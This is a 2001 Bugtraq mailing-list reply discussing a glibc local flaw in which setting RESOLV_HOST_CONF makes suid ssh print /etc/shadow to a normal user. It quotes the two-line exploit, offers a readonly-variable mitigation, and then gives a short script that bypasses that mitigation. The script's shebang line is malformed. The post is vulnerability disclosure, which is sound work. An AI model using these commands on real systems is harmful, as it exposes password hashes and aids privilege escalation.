[18548] in bugtraq
Re: Glibc Local Root Exploit
daemon@ATHENA.MIT.EDU (Digital Overdrive)
Wed Jan 10 21:34:35 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3A5CE593.F49B6DAA@dsinet.org>
Date: Wed, 10 Jan 2001 23:43:31 +0100
Reply-To: digiover@dsinet.org
From: Digital Overdrive <digiover@DSINET.ORG>
X-To: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Charles Stevenson wrote:
>
> Hi all,
> This has been bouncing around on vuln-dev and the debian-devel lists. It
> effects glibc >= 2.1.9x and it would seem many if not all OSes using these
> versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
> the actual fix was a missing comma in the list of secure env vars that were
> supposed to be cleared when a program starts up suid/sgid (including
> RESOLV_HOST_CONF)." The exploit varies from system to system but in our
> devel version of Yellow Dog Linux I was able to print the /etc/shadow file
> as a normal user in the following manner:
>
> export RESOLV_HOST_CONF=/etc/shadow
> ssh whatever.host.com
huge typo in my previous post...
services has to be profiles ;-)
----
[Credits to ^herman^ in #hit2000 on ircnet]
A temp. sollution is to place this in /etc/profiles:
declare -r RESOLV_HOST_CONF
jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable
jan@flits102-93:~$
----
But even here is a workaround for :
Make a script (e.g. blaat)
!#bin/sh
export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com
~$ sh --noprofile blaat
[again credits to ^herman^]
Regards,
Jan (Digital Overdrive)
--
.~. http://www.dsinet.org | http://www.dsinet.org/hackfaq
/V\ digiover@dsinet.org | digiover@cotse.com
/( )\
^^-^^
